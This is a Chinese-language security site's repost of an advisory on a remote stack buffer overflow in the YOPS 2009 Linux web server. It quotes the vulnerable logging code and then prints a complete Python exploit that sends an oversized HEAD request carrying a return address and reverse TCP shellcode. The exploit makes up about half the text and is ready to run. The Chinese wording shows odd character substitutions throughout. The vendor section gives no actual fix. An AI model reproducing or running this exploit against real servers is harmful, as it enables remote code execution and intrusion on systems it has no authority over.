当前位置:七道奇文章资讯安全技术网络技术
日期:2010-09-16 00:23:00  来源:本站整理

YOPS服务器HTTP恳求远程溢出漏洞及修复[网络技术]

赞助商链接



  本文“YOPS服务器HTTP恳求远程溢出漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

影响版本:
yoopss YOPS 2009漏洞描写:
YOPS(Your Own Personal [WEB] Server)是用C编写的Linux平台HTTP服务器.

YOPS服务器的http_parse_request_header函数没有对从HTTP号令((HEAD/GET/POST)所接纳到的缓冲区履行边界查抄便在swebs_record_log函数顶用作了logger变量的参数,超长恳求参数可以触发缓冲区溢出,招致履行肆意代码.以下是有漏洞代码段:

--- http.c snippet ---

int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
       if (r != 2)
               return -400;
[...]
}
--- END snippet ---

--- swebs.c snippet ---

int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
       sprintf (
               logrec,
               "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
               job->client,
               timestr,
               job->hdr.request_line,
               job->response_hlen,
               job->response_blen_sent,
               job->response_blen,
               job->status
               );
[...]
}
--- END snippet ---<*参考
Rodrigo Escobar (ipax@dclabs.com.br)

http://marc.info/?l=bugtraq&m=128415017107354&w=2
*>
测试办法:

本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负!
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br
 
HOST = "localhost"
PORT = 8888
 
import socket
import sys
import time
 
try:
BUFF_LEN = int(sys.argv[1])
except:
BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"
 
shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)
 
buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"
 
stackadjust = (
"\xcb" # instruction alignment
"\xbc\x69\x69\x96\xb0" # Stack Adjustment
)
 
payload = buffer + stackadjust + shellcode + "\r\n\r\n"
 
print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""
 
print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
s.recv(1024)
except:
pass
s.close()
 
time.sleep(3)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

厂商补钉:

yoopss
------
我们倡议利用此软件的用户随时关注厂商的主页以获得最新版本:

http://sourceforge.net/projects/yops2009/


  以上是“YOPS服务器HTTP恳求远程溢出漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • YOPS服务器HTTP恳求远程溢出漏洞及修复
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .